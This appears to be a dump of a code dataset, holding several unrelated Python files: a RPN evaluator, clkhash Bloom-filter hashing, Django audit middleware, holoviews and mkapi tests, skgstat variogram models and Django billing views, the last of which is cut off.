id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
6409273 | <gh_stars>10-100
class Solution:
    def evalRPN(self, tokens: List[str]) -> int:
        """Evaluate an expression given in Reverse Polish Notation.

        Operands are pushed onto a stack; each operator pops the two most
        recent operands, applies itself, and pushes the result. Division
        truncates toward zero (LeetCode semantics), hence int(a / b).
        """
        operations = {
            "+": lambda a, b: a + b,
            "-": lambda a, b: a - b,
            "*": lambda a, b: a * b,
            "/": lambda a, b: int(a / b),  # truncate toward zero
        }
        stack = []
        for token in tokens:
            apply_op = operations.get(token)
            if apply_op is None:
                stack.append(int(token))
            else:
                right = stack.pop()
                left = stack.pop()
                stack.append(apply_op(left, right))
        return stack[-1]
| StarcoderdataPython |
3492037 | import examples
from examples.meta import C, F
from mkapi.core.base import Docstring
from mkapi.core.docstring import parse_bases
from mkapi.core.inherit import inherit
from mkapi.core.node import get_node
def test_mro_docstring():
    """parse_bases lists base classes in MRO order with markdown links."""
    cases = ((C, ["B", "A"]), (F, ["E", "D"]))
    for klass, base_names in cases:
        doc = Docstring()
        parse_bases(doc, klass)
        items = doc["Bases"].items
        assert len(items) == len(base_names)
        for item, name in zip(items, base_names):
            expected = "[examples.meta.{0}](!examples.meta.{0})".format(name)
            assert item.type.markdown == expected
def test_mro_node():
    """get_node(C) collects inherited f and own g, in that order."""
    node = get_node(C)
    expected_ids = ["examples.meta.A.f", "examples.meta.C.g"]
    assert len(node.members) == len(expected_ids)
    for member, object_id in zip(node.members, expected_ids):
        assert member.object.id == object_id
def test_mro_inherit():
    """inherit() propagates the parent's parameter description to C.g."""
    node = get_node(C)
    inherit(node)
    parameters = node.members[1].docstring["Parameters"]
    assert parameters.items[0].description.markdown == "parameter."
def test_mro_module():
    """The examples.meta module node exposes six members."""
    assert len(get_node(examples.meta).members) == 6
| StarcoderdataPython |
1834712 | <filename>clkhash/clk.py<gh_stars>10-100
"""
Generate CLK from data.
"""
import concurrent.futures
import csv
import logging
import time
from typing import (AnyStr, Callable, cast, Iterable, List, Optional,
Sequence, TextIO, Tuple, TypeVar, Union)
from bitarray import bitarray
from tqdm import tqdm
from clkhash.bloomfilter import stream_bloom_filters
from clkhash.serialization import serialize_bitarray
from clkhash.key_derivation import generate_key_lists
from clkhash.schema import Schema
from clkhash.stats import OnlineMeanVariance
from clkhash.validate_data import (validate_entries, validate_header,
validate_row_lengths)
log = logging.getLogger('clkhash.clk')
CHUNK_SIZE = 1000
def hash_chunk(chunk_pii_data: Sequence[Sequence[str]],
               keys: Sequence[Sequence[bytes]],
               schema: Schema
               ) -> Tuple[List[bitarray], Sequence[int]]:
    """Generate Bloom filters (ie hash) from one chunk of PII.

    Also computes the Hamming weight (popcount -- number of bits set to
    one) of each generated Bloom filter.

    :param chunk_pii_data: An iterable of indexable records.
    :param keys: A tuple of two lists of keys used in the HMAC. Should
        have been created by `generate_key_lists`.
    :param schema: Schema specifying the entry formats and hashing
        settings.
    :return: A list of Bloom filters as bitarrays and a list of
        corresponding popcounts.
    """
    bloom_filters = []
    popcounts = []
    # Each streamed result is indexable: element 0 is the filter bitarray,
    # element 2 is its popcount.
    for result in stream_bloom_filters(chunk_pii_data, keys, schema):
        bloom_filters.append(result[0])
        popcounts.append(result[2])
    return bloom_filters, popcounts
def generate_clk_from_csv(input_f: TextIO,
                          secret: AnyStr,
                          schema: Schema,
                          validate: bool = True,
                          header: Union[bool, AnyStr] = True,
                          progress_bar: bool = True,
                          max_workers: Optional[int] = None
                          ) -> List[bitarray]:
    """ Generate Bloom filters from CSV file, then serialise them.

    This function also computes and outputs the Hamming weight
    (a.k.a popcount -- the number of bits set to high) of the
    generated Bloom filters.

    :param input_f: A file-like object of csv data to hash.
    :param secret: A secret.
    :param schema: Schema specifying the record formats and
        hashing settings.
    :param validate: Set to `False` to disable validation of
        data against the schema. Note that this will silence
        warnings whose aim is to keep the hashes consistent between
        data sources; this may affect linkage accuracy.
    :param header: Set to `False` if the CSV file does not have
        a header. Set to `'ignore'` if the CSV file does have a
        header but it should not be checked against the schema.
    :param bool progress_bar: Set to `False` to disable the progress
        bar.
    :param int max_workers: Passed to ProcessPoolExecutor except for the
        special case where the value is 1, in which case no processes
        or threads are used. This may be useful or required on platforms
        that are not capable of spawning subprocesses.
    :return: A list of Bloom filters as bitarrays and a list of
        corresponding popcounts.
    """
    if header not in {False, True, 'ignore'}:
        raise ValueError("header must be False, True or 'ignore' but is {!s}."
                         .format(header))
    log.info("Hashing data")
    # Read from CSV file
    reader = csv.reader(input_f)
    # Both True and 'ignore' are truthy, so the header row is always
    # consumed here; it is only validated against the schema for True.
    if header:
        column_names = next(reader)
        if header != 'ignore':
            validate_header(schema.fields, column_names)
    start_time = time.time()
    # Read the lines in CSV file and add it to PII
    pii_data = []
    for line in reader:
        pii_data.append(tuple(element.strip() for element in line))
    validate_row_lengths(schema.fields, pii_data)
    if progress_bar:
        stats = OnlineMeanVariance()
        with tqdm(desc="generating CLKs", total=len(pii_data), unit='clk', unit_scale=True,
                  postfix={'mean': stats.mean(), 'std': stats.std()}) as pbar:
            # Progress hook: fold each chunk's popcounts into the running
            # statistics and advance the bar by the number of hashed CLKs.
            def callback(tics, clk_stats):
                stats.update(clk_stats)
                pbar.set_postfix(mean=stats.mean(), std=stats.std(), refresh=False)
                pbar.update(tics)

            results = generate_clks(pii_data,
                                    schema,
                                    secret,
                                    validate=validate,
                                    callback=callback,
                                    max_workers=max_workers
                                    )
    else:
        results = generate_clks(pii_data,
                                schema,
                                secret,
                                validate=validate,
                                max_workers=max_workers
                                )
    log.info("Hashing took {:.2f} seconds".format(time.time() - start_time))
    return results
def generate_clks(pii_data: Sequence[Sequence[str]],
                  schema: Schema,
                  secret: AnyStr,
                  validate: bool = True,
                  callback: Optional[Callable[[int, Sequence[int]], None]] = None,
                  max_workers: Optional[int] = None
                  ) -> List[bitarray]:
    """Generate Bloom filters (CLKs) for already-parsed PII records.

    :param pii_data: Sequence of indexable records, one per entity.
    :param schema: Schema specifying the entry formats and hashing settings.
    :param secret: Secret used to derive the per-field HMAC keys.
    :param validate: If True, validate the entries against the schema first.
    :param callback: Optional progress hook invoked after each hashed chunk
        with (number of CLKs in the chunk, their popcounts).
    :param max_workers: Passed to ProcessPoolExecutor; the special value 1
        disables multiprocessing and hashes in-process instead.
    :return: A list of Bloom filters as bitarrays.
    """
    # Generate two keys for each identifier from the secret, one key per hashing method used when computing
    # the bloom filters.
    # Otherwise it could create more if required using the parameter `num_hashing_methods` in `generate_key_lists`
    key_lists = generate_key_lists(
        secret,
        len(schema.fields),
        key_size=schema.kdf_key_size,
        salt=schema.kdf_salt,
        info=schema.kdf_info,
        kdf=schema.kdf_type,
        hash_algo=schema.kdf_hash)
    if validate:
        validate_entries(schema.fields, pii_data)
    # Chunks PII
    log.info("Hashing {} entities".format(len(pii_data)))
    # Smaller chunks for small inputs keep progress callbacks responsive.
    chunk_size = 200 if len(pii_data) <= 10000 else 1000
    futures = []
    if max_workers is None or max_workers > 1:
        # Compute Bloom filter from the chunks and then serialise it
        with concurrent.futures.ProcessPoolExecutor(max_workers=max_workers) as executor:
            for chunk in chunks(pii_data, chunk_size):
                future = executor.submit(
                    hash_chunk,
                    chunk, key_lists, schema, )
                if callback is not None:
                    unpacked_callback = cast(Callable[[int, Sequence[int]], None],
                                             callback)
                    # The lambda closes over unpacked_callback; it is rebound
                    # every iteration but always to the same callable, so the
                    # usual late-binding pitfall does not apply here.
                    future.add_done_callback(
                        lambda f: unpacked_callback(len(f.result()[0]),
                                                    f.result()[1]))
                futures.append(future)
        # Collect results in submission order so output order is stable.
        results = []
        for future in futures:
            clks, clk_stats = future.result()
            results.extend(clks)
    else:
        # Serial fallback (max_workers == 1): hash in-process, no executor.
        results = []
        for chunk in chunks(pii_data, chunk_size):
            clks, clk_stats = hash_chunk(chunk, key_lists, schema)
            if callback is not None:
                unpacked_callback = cast(Callable[[int, Sequence[int]], None], callback)
                unpacked_callback(len(clks), clk_stats)
            results.extend(clks)
    return results
T = TypeVar('T')  # generic element type handled by chunks()


def chunks(seq: Sequence[T], chunk_size: int) -> Iterable[Sequence[T]]:
    """Split *seq* into consecutive chunks of at most *chunk_size* elements.

    The final chunk may be shorter than *chunk_size*.

    :param seq: A sequence to chunk.
    :param chunk_size: The size of chunk.
    """
    offsets = range(0, len(seq), chunk_size)
    return (seq[start:start + chunk_size] for start in offsets)
| StarcoderdataPython |
from .setup_structlog import setup_structlog

# Configure structlog as an import-time side effect of this package.
setup_structlog()
| StarcoderdataPython |
1925428 | <filename>core/middleware.py
from functools import partial

from django.db.models import signals
from django.utils.functional import curry
class AuditMiddleware(object):
    """Middleware that stamps models with the acting user on save.

    For every mutating request (anything other than GET/HEAD/OPTIONS/TRACE)
    a pre_save handler is connected that fills ``criado_por`` (created by)
    and ``atualizado_por`` (updated by) on saved instances. The handler is
    keyed by the request via dispatch_uid and disconnected after the
    response is produced.
    """

    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        if request.method not in ('GET', 'HEAD', 'OPTIONS', 'TRACE'):
            if hasattr(request, 'user') and request.user.is_authenticated:
                user = request.user
            else:
                user = None
            # functools.partial replaces django.utils.functional.curry,
            # which was removed in Django 3.0 (it was an alias for partial).
            mark_whodid = partial(self.mark_whodid, user)
            signals.pre_save.connect(mark_whodid, dispatch_uid=(self.__class__, request,), weak=False)
        response = self.get_response(request)
        response = self.process_response(request, response)
        return response

    def process_response(self, request, response):
        # Disconnect the per-request handler (no-op for read-only requests).
        signals.pre_save.disconnect(dispatch_uid=(self.__class__, request,))
        return response

    def mark_whodid(self, user, sender, instance, **kwargs):
        """pre_save receiver: record creator (only once) and last updater."""
        if not getattr(instance, 'criado_por_id', None):
            instance.criado_por = user
        if hasattr(instance, 'atualizado_por'):
            instance.atualizado_por = user
| StarcoderdataPython |
1920135 | <gh_stars>0
from ..data_object.pyradiomics_response import NumpyArrayEncoder
from ..models.SitkImage import get_metadata_dictionary
import os
import SimpleITK as sitk
from django.http import HttpResponse, JsonResponse
from django.conf import settings
def handle(request, idImage=''):
    """Dispatch an image request: DELETE removes it, GET returns metadata.

    Other HTTP methods fall through and return None (unhandled).
    """
    if request.method == 'DELETE':
        delete_image(idImage)
        return HttpResponse(status=200)
    if request.method == 'GET':
        return JsonResponse(get_metadata(idImage), NumpyArrayEncoder)
def delete_image(idImage: str) -> None:
    """[Delete the Image]

    Args:
        idImage (str): [Input idImage]

    Removes the stored NIfTI file for the given image id.
    """
    target = settings.STORAGE_DIR + "/image/image_" + idImage + ".nii"
    os.remove(target)
def get_metadata(idImage: str) -> dict:
    """[Get the metadata from an image]

    Args:
        idImage (str): [Input image]

    Returns:
        dict: [formatted dictionary ready to be sent as a JSON]
    """
    image_path = "{}/image/image_{}.nii".format(settings.STORAGE_DIR, idImage)
    loaded_image = sitk.ReadImage(image_path)
    return get_metadata_dictionary(loaded_image)
| StarcoderdataPython |
4917831 | from setuptools import setup, find_packages
def get_tag():
    """Return the release tag stored in the VERSION file, stripped.

    Uses a context manager so the file is closed even if the read fails
    (the original leaked the handle on exception).
    """
    with open('VERSION', 'r') as f:
        return f.read().strip()
def get_description():
    """Return the full README contents for use as the long description.

    Uses a context manager so the file is closed even if the read fails
    (the original leaked the handle on exception).
    """
    with open('README', 'r') as f:
        return f.read()
# Package metadata; the version and long description are read from the
# VERSION and README files at build time by the helpers above.
setup(name='hailc',
      version=get_tag(),
      description='Lightly reviewed community code snippets for Hail.',
      long_description=get_description(),
      url='https://github.com/hail-is/hail-contrib',
      author='<NAME>',
      author_email='<EMAIL>',
      license='MIT',
      classifiers=[
          'Development Status :: 3 - Alpha',
          'License :: OSI Approved :: MIT License',
          'Programming Language :: Python :: 2.7'
      ],
      keywords='bioinformatics genomics spark hail',
      packages=find_packages()
      )
| StarcoderdataPython |
224793 | <gh_stars>1-10
#!/usr/bin/python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
from eospac import EosMaterial
from eospac.eospac.libsesio import _write_sesbin
import numpy as np
from numpy.testing import assert_allclose
def is_equal(x, y):
    """Assert that *x* equals *y*, with a readable failure message.

    The original bare ``assert x == y`` reported no values on failure.
    """
    assert x == y, "{!r} != {!r}".format(x, y)
| StarcoderdataPython |
9601800 | from .pen import Pen
class PenCollection:
    """An indexed collection of Pen objects with colour-matching helpers."""

    def __init__(self, initialisation_collection):
        """Build the collection from an iterable of pen description dicts.

        Each dict must provide 'brand', 'name' and 'rgb' keys.
        """
        self.pens = {}
        # enumerate replaces the original manual index counter.
        for index, spec in enumerate(initialisation_collection):
            self.pens[index] = Pen(spec["brand"], spec["name"], rgb=spec["rgb"])

    def closest_pen_to_colour(self, colour):
        """Return the pen whose colour is nearest to *colour*.

        min() returns the first minimum in insertion order, matching the
        original strict-less-than scan (and computes each distance once).
        """
        return min(self.pens.values(),
                   key=lambda pen: pen.colour.distance_to_colour(colour))

    def find_complementary_pen(self, pen=None, colour=None):
        """Return the pen closest to the complement of *pen*'s colour,
        or closest to *colour* directly. Exactly one must be given."""
        if pen is not None:
            return self.closest_pen_to_colour(pen.colour.complementary_colour())
        if colour is not None:
            return self.closest_pen_to_colour(colour)
        raise ValueError("Must pass in either a colour or pen")

    def find_analogous_pens(self, pen):
        """Return the closest pens to each of *pen*'s analogous colours."""
        return [self.closest_pen_to_colour(colour)
                for colour in pen.colour.analogous_colours()]

    def find_split_complementary_pens(self, pen):
        """Return the closest pens to *pen*'s split-complementary colours."""
        return [self.closest_pen_to_colour(colour)
                for colour in pen.colour.split_complementary()]

    def find_pen_by_pen_number(self, pen_number):
        """Return the first pen whose name contains *pen_number*.

        Raises ValueError if no pen matches.
        """
        for pen in self.pens.values():
            if pen_number in pen.name:
                return pen
        raise ValueError("Pen does not exist in collection")
| StarcoderdataPython |
11306516 | <gh_stars>1-10
from math import floor
from pathlib import Path
from sys import argv
def main():
    """Sum the fuel requirement mass // 3 - 2 over masses in the input file.

    The file path is taken from the first command-line argument; reading
    stops at the first blank line (readline() returns '' at EOF, which
    also stops the loop).
    """
    file_path = Path(argv[1])
    with file_path.open() as file:
        result = 0
        while text := file.readline().strip():
            # Integer floor division replaces floor(int(text) / 3): the
            # float round-trip can lose precision for very large masses,
            # while // is exact (and identical for all normal inputs).
            result += int(text) // 3 - 2
        print(result)


if __name__ == '__main__':
    main()
| StarcoderdataPython |
8002632 | <reponame>htlcnn/ironpython-stubs
# Auto-generated IronPython stub for a Revit API type: method bodies are
# `pass` placeholders that exist only to document signatures for tooling.
class TriangulatedShellComponent(object,IDisposable):
    """
    This class represents a triangulated boundary component of a solid or a
    triangulated connected component of a shell.
    """
    def Clear(self):
        """
        Clear(self: TriangulatedShellComponent)
        Empties the contents of this TriangulatedShellComponent.
        """
        pass
    def Dispose(self):
        """ Dispose(self: TriangulatedShellComponent) """
        pass
    def GetTriangle(self,triangleIndex):
        """
        GetTriangle(self: TriangulatedShellComponent,triangleIndex: int) -> TriangleInShellComponent

        Returns the triangle corresponding to the given index.

        triangleIndex: The index of the triangle (between 0 and TriangleCount-1,inclusive).
        Returns: The triangle.
        """
        pass
    def GetVertex(self,vertexIndex):
        """
        GetVertex(self: TriangulatedShellComponent,vertexIndex: int) -> XYZ

        Returns the vertex with a given index.

        vertexIndex: The index of the vertex (between 0 and getVertexCount()-1,inclusive).
        Returns: A copy of the requested vertex.
        """
        pass
    def ReleaseUnmanagedResources(self,*args):
        """ ReleaseUnmanagedResources(self: TriangulatedShellComponent,disposing: bool) """
        pass
    def __enter__(self,*args):
        """ __enter__(self: IDisposable) -> object """
        pass
    def __exit__(self,*args):
        """ __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __repr__(self,*args):
        """ __repr__(self: object) -> str """
        pass
    # Stub properties: getter/setter/deleter lambdas are placeholders only.
    IsClosed=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """True if and only if the triangulation represents a topologically closed shell
    (i.e.,each edge is shared by two triangles).

    Get: IsClosed(self: TriangulatedShellComponent) -> bool
    """
    IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Specifies whether the .NET object represents a valid Revit entity.

    Get: IsValidObject(self: TriangulatedShellComponent) -> bool
    """
    TriangleCount=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """The number of triangles in the triangulation.

    Get: TriangleCount(self: TriangulatedShellComponent) -> int
    """
    VertexCount=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """The number of vertices in the triangulation.

    Get: VertexCount(self: TriangulatedShellComponent) -> int
    """
| StarcoderdataPython |
8063591 | <reponame>Stevesie/stevesie-py
import pytest
@pytest.fixture
def app():
    """Canned API 'app' payload used as fixture data in the test suite."""
    return {
        "id": "e43a024d-9e16-41ea-8d16-b8b0e8d88464",
        "name": "App",
        "description": "Access your account programmatically.",
        "website": "https://test.com/",
        "slug": "test",
        "createdAt": "2016-06-30 02:08:06",
        "updatedAt": "2018-04-21 13:13:09",
        "isPublic": True,
        "iconUrl": "/assets/media/test.png"
    }
| StarcoderdataPython |
9796323 | <filename>tests/testelementindexing.py
"""
Test cases for both indexing and slicing of elements
"""
import numpy as np
from holoviews import Histogram, QuadMesh
from holoviews.element.comparison import ComparisonTestCase
class HistogramIndexingTest(ComparisonTestCase):
    """Indexing/slicing semantics for Histogram: slices use inclusive-lower,
    exclusive-upper boundary semantics on bin centers; a scalar indexes the
    bin whose [edge, next_edge) interval contains the key."""

    def setUp(self):
        self.values = [i for i in range(10)]
        self.edges = [i for i in range(11)]
        self.hist = Histogram(self.values, self.edges)

    def test_slice_all(self):
        sliced = self.hist[:]
        self.assertEqual(np.all(sliced.values == self.values), True)
        self.assertEqual(np.all(sliced.edges == self.edges), True)

    def test_slice_exclusive_upper(self):
        "Exclusive upper boundary semantics for bin centers"
        sliced = self.hist[:6.5]
        self.assertEqual(np.all(sliced.values == [0, 1, 2, 3, 4, 5]), True)
        self.assertEqual(np.all(sliced.edges == [0, 1, 2, 3, 4, 5, 6]), True)

    def test_slice_exclusive_upper_exceeded(self):
        "Slightly above the boundary in the previous test"
        sliced = self.hist[:6.55]
        self.assertEqual(np.all(sliced.values == [0, 1, 2, 3, 4, 5, 6]), True)
        self.assertEqual(np.all(sliced.edges == [0, 1, 2, 3, 4, 5, 6, 7]), True)

    def test_slice_inclusive_lower(self):
        "Inclusive lower boundary semantics for bin centers"
        sliced = self.hist[3.5:]
        self.assertEqual(np.all(sliced.values == [3, 4, 5, 6, 7, 8, 9]), True)
        self.assertEqual(np.all(sliced.edges == [3, 4, 5, 6, 7, 8, 9, 10]), True)

    def test_slice_inclusive_lower_undershot(self):
        "Inclusive lower boundary semantics for bin centers"
        sliced = self.hist[3.45:]
        self.assertEqual(np.all(sliced.values == [3, 4, 5, 6, 7, 8, 9]), True)
        self.assertEqual(np.all(sliced.edges == [3, 4, 5, 6, 7, 8, 9, 10]), True)

    def test_slice_bounded(self):
        sliced = self.hist[3.5:6.5]
        self.assertEqual(np.all(sliced.values == [3, 4, 5]), True)
        self.assertEqual(np.all(sliced.edges == [3, 4, 5, 6]), True)

    def test_slice_lower_out_of_bounds(self):
        sliced = self.hist[-3:]
        self.assertEqual(np.all(sliced.values == self.values), True)
        self.assertEqual(np.all(sliced.edges == self.edges), True)

    def test_slice_upper_out_of_bounds(self):
        sliced = self.hist[:12]
        self.assertEqual(np.all(sliced.values == self.values), True)
        self.assertEqual(np.all(sliced.edges == self.edges), True)

    def test_slice_both_out_of_bounds(self):
        sliced = self.hist[-3:13]
        self.assertEqual(np.all(sliced.values == self.values), True)
        self.assertEqual(np.all(sliced.edges == self.edges), True)

    def test_scalar_index(self):
        self.assertEqual(self.hist[4.5], 4)
        self.assertEqual(self.hist[3.7], 3)
        self.assertEqual(self.hist[9.9], 9)

    def test_scalar_index_boundary(self):
        """
        Scalar at boundary indexes next bin.
        (exclusive upper boundary for current bin)
        """
        self.assertEqual(self.hist[4], 4)
        self.assertEqual(self.hist[5], 5)

    def test_scalar_lowest_index(self):
        self.assertEqual(self.hist[0], 0)

    def test_scalar_lowest_index_out_of_bounds(self):
        # Fixed: the original passed silently when no exception was raised
        # at all; the `else` clause now makes that a failure too.
        try:
            self.hist[-0.1]
        except Exception as e:
            if not str(e).startswith("'Key value -0.1 is out of the histogram bounds"):
                raise AssertionError("Out of bound exception not generated")
        else:
            raise AssertionError("Out of bound exception not generated")

    def test_scalar_highest_index_out_of_bounds(self):
        # Fixed: same vacuous-pass bug as above.
        try:
            self.hist[10]
        except Exception as e:
            if not str(e).startswith("'Key value 10 is out of the histogram bounds"):
                raise AssertionError("Out of bound exception not generated")
        else:
            raise AssertionError("Out of bound exception not generated")
class QuadMeshIndexingTest(ComparisonTestCase):
    """Indexing and slicing semantics for QuadMesh on an irregular grid
    (log-spaced x edges, linearly spaced y edges)."""

    def setUp(self):
        n = 4
        # n x n grid of bin edges enclosing an (n-1) x (n-1) value array.
        self.xs = np.logspace(1, 3, n)
        self.ys = np.linspace(1, 10, n)
        self.zs = np.arange((n-1)**2).reshape(n-1, n-1)
        self.qmesh = QuadMesh((self.xs, self.ys, self.zs))

    def test_qmesh_index_lower_left(self):
        self.assertEqual(self.qmesh[0, 0], 0)

    def test_qmesh_index_lower_right(self):
        self.assertEqual(self.qmesh[800, 3.9], 2)

    def test_qmesh_index_top_left(self):
        self.assertEqual(self.qmesh[10, 9.9], 6)

    def test_qmesh_index_top_right(self):
        self.assertEqual(self.qmesh[216, 7], 8)

    def test_qmesh_index_xcoords(self):
        # Scalar x with full y slice selects one column of quads.
        sliced = QuadMesh((self.xs[2:4], self.ys, self.zs[:, 2:3]))
        self.assertEqual(self.qmesh[300, :], sliced)

    def test_qmesh_index_ycoords(self):
        # Scalar y with full x slice selects one row of quads.
        sliced = QuadMesh((self.xs, self.ys[-2:], self.zs[-1:, :]))
        self.assertEqual(self.qmesh[:, 7], sliced)

    def test_qmesh_slice_xcoords(self):
        sliced = QuadMesh((self.xs[1:], self.ys, self.zs[:, 1:]))
        self.assertEqual(self.qmesh[100:1000, :], sliced)

    def test_qmesh_slice_ycoords(self):
        sliced = QuadMesh((self.xs, self.ys[:-1], self.zs[:-1, :]))
        self.assertEqual(self.qmesh[:, 2:7], sliced)

    def test_qmesh_slice_xcoords_ycoords(self):
        sliced = QuadMesh((self.xs[1:], self.ys[:-1], self.zs[:-1, 1:]))
        self.assertEqual(self.qmesh[100:1000, 2:7], sliced)
| StarcoderdataPython |
6471400 | <filename>skgstat/stmodels.py
from functools import wraps
import numpy as np
def stvariogram(func):
    """Decorator that vectorizes a space-time variogram model.

    If the first argument is a 2D array of (space, time) lag pairs, the
    wrapped model is evaluated row-wise and a float array is returned;
    otherwise the model is called directly on the single lag pair.

    Uses getattr so plain tuples/lists (which have no .ndim) fall through
    to the direct call instead of raising AttributeError as before --
    a backward-compatible generalization.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        lags = args[0]
        if getattr(lags, 'ndim', 0) == 2:
            extra_args = args[1:]
            mapping = map(lambda lag_pair: func(lag_pair, *extra_args, **kwargs), lags)
            return np.fromiter(mapping, dtype=float)
        return func(*args, **kwargs)
    return wrapper
@stvariogram
def sum(lags, Vx, Vt):
    r"""Sum space-time model.

    Separable space-time variogram model: the semivariance is the plain sum
    of the two fitted marginal models, with no fitting parameters:

    .. math::
        \gamma (h,t) = \gamma_x (h) + \gamma_t (t)

    :param lags: tuple of the space (h) and time (t) lag.
    :param Vx: fitted spatial marginal variogram model
        (skgstat.Variogram.fitted_model); a poor marginal fit makes the
        space-time fit poor as well.
    :param Vt: fitted temporal marginal variogram model (same caveat).
    :return: the semivariance modeled for the given lag pair.

    Notes
    -----
    Use with care: this model assumes an isotropic covariance field in the
    space and time directions, which is rarely true, and may not be
    strictly definite (Myers & Journel 1990; Dimitrakopoulos & Luo 1994).
    NOTE: the function name shadows the builtin ``sum`` by design of the
    public model-key API and is kept for compatibility.
    """
    h, t = lags
    space_term = Vx(h)
    time_term = Vt(t)
    return space_term + time_term
@stvariogram
def product(lags, Vx, Vt, Cx, Ct):
    r"""Product space-time model.

    Separable space-time variogram model based on the product of the
    marginal space and time models (De Cesare et al. 2002):

    .. math::
        \gamma (h,t) = C_x \gamma_t(t) + C_t \gamma_x(h)
                       - \gamma_x(h) \gamma_t(t)

    :param lags: tuple of the space (h) and time (t) lag.
    :param Vx: fitted spatial marginal variogram model
        (skgstat.Variogram.fitted_model).
    :param Vt: fitted temporal marginal variogram model.
    :param Cx: marginal space sill.
    :param Ct: marginal time sill.
    :return: the semivariance modeled for the given lag pair.
    """
    h, t = lags
    gamma_space = Vx(h)
    gamma_time = Vt(t)
    # Marginals are deterministic fitted models, so each is evaluated once.
    return Cx * gamma_time + Ct * gamma_space - gamma_space * gamma_time
@stvariogram
def product_sum(lags, Vx, Vt, k1, k2, k3, Cx, Ct):
    r"""Product-Sum space-time model.

    Separable space-time variogram model combining the 'sum' and 'product'
    models, following De Cesare et al. (2001, 2002):

    .. math::
        \gamma_{ST}(h_s, h_t) = [k_1 C_T(0) + k_2]\gamma_S(h_s) +
        [k_1 C_S(0) + k_3]\gamma_T(h_t) - k_1\gamma_S(h_s)\gamma_T(h_t)

    :param lags: tuple of the space (h) and time (t) lag.
    :param Vx: fitted spatial marginal variogram model
        (skgstat.Variogram.fitted_model).
    :param Vt: fitted temporal marginal variogram model.
    :param k1: fitting parameter; positive, not larger than all
        marginal sills.
    :param k2: fitting parameter; non-negative, not larger than all
        marginal sills.
    :param k3: fitting parameter; positive, not larger than all
        marginal sills.
    :param Cx: marginal space sill.
    :param Ct: marginal time sill.
    :return: the semivariance modeled for the given lag pair.
    """
    h, t = lags
    gamma_space = Vx(h)
    gamma_time = Vt(t)
    return ((k2 + k1 * Ct) * gamma_space
            + (k3 + k1 * Cx) * gamma_time
            - k1 * gamma_space * gamma_time)
| StarcoderdataPython |
8114374 | <reponame>joonyoungleeduke/MatchMe
from django.db import models
from django.contrib.auth.models import User, Group
from django.dispatch import receiver
from django.db.models.signals import post_save
class Profile(models.Model):
    """One-to-one extension of the built-in User with matching data."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    # Free-form self description; optional.
    bio = models.TextField(blank=True, default='')
    # Match counters (semantics of individual vs total not shown here --
    # presumably per-session vs lifetime; TODO confirm with matching logic).
    ind_matches = models.IntegerField(blank=True, default=0)
    total_matches = models.IntegerField(blank=True, default=0)
    # Three ranked user preferences consumed elsewhere for matching.
    preference1 = models.CharField(max_length=100)
    preference2 = models.CharField(max_length=100)
    preference3 = models.CharField(max_length=100)
    image = models.ImageField(upload_to='profile_pictures', default='default_profile.jpg')
@receiver(post_save, sender=User)
def create_profile(sender, instance, created, **kwargs):
    """Create a Profile automatically for every newly created User.

    ``objects.create()`` already persists the row, so the original trailing
    ``.save()`` issued a redundant second database write; it was removed.
    """
    if created:
        Profile.objects.create(user=instance)
9775591 | <filename>community_pulse/questions/tests/test_admin.py
from django.contrib import admin
from django.test import TestCase
from ..admin import QuestionAdmin
from ..models import Question
class QuestionAdminTest(TestCase):
    """Checks that QuestionAdmin is registered and configured as expected."""

    def test_admin_should_be_registered(self):
        registered_admin = admin.site._registry[Question]
        assert isinstance(registered_admin, QuestionAdmin)

    def test_admin_should_set_list_display(self):
        assert QuestionAdmin.list_display == ('title', 'event', 'created', 'modified',)

    def test_admin_should_set_list_filter(self):
        assert QuestionAdmin.list_filter == ('event__name', 'type',)

    def test_admin_should_set_search_fields(self):
        assert QuestionAdmin.search_fields == ('title',)
| StarcoderdataPython |
8064928 | from django.core.urlresolvers import reverse_lazy
from django.http import HttpResponseForbidden
from django.shortcuts import get_object_or_404
from django.views.generic.base import TemplateView
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView, \
FormView
from . import sepa
from . import forms
from . import models
# Create your views here.
# Field whitelists shared by the generic create/update views below.
CLIENTE_FIELDS = [
    'referencia', 'nombre', 'nif', 'direccion', 'codpostal', 'poblacion',
    'provincia', 'email', 'bic', 'iban'
]
COBRO_FIELDS = [
    'servicio', 'referencia', 'concepto', 'fecha', 'tipo', 'importe'
]
EMPRESA_FIELDS = [
    'cod_pais', 'tipo_presentador', 'nombre', 'nif', 'direccion', 'codpostal',
    'poblacion', 'provincia', 'bic', 'iban', 'presentador'
]
# SEPA direct-debit mandate: creditor (cdtr_*) and debtor (dbtr_*) details.
DOMICILIACION_FIELDS = [
    'referencia', 'fecha_firma', 'recurrente', 'cdtr_nif', 'cdtr_nombre',
    'cdtr_direccion', 'cdtr_codpostal', 'cdtr_poblacion', 'cdtr_provincia',
    'cdtr_pais', 'dbtr_nif', 'dbtr_nombre', 'dbtr_direccion', 'dbtr_codpostal',
    'dbtr_poblacion', 'dbtr_provincia', 'dbtr_bic', 'dbtr_iban'
]
SERVICIO_FIELDS = [
    'cliente', 'fecha', 'descripcion', 'importe', 'periodicidad'
]
REMESA_FIELDS = [
    'presentador', 'referencia', 'fecha'
]
class IndexView(TemplateView):
    """Landing page; renders the base template directly."""
    template_name = 'serp/base.html'
# ----- CLIENTES -----
class ClienteListView(ListView):
    """List all Cliente records."""
    model = models.Cliente
class ClienteCreateView(CreateView):
    """Create a Cliente using the shared CLIENTE_FIELDS form."""
    model = models.Cliente
    fields = CLIENTE_FIELDS
class ClienteUpdateView(UpdateView):
    """Edit a Cliente using the shared CLIENTE_FIELDS form."""
    model = models.Cliente
    fields = CLIENTE_FIELDS
class ClienteDeleteView(DeleteView):
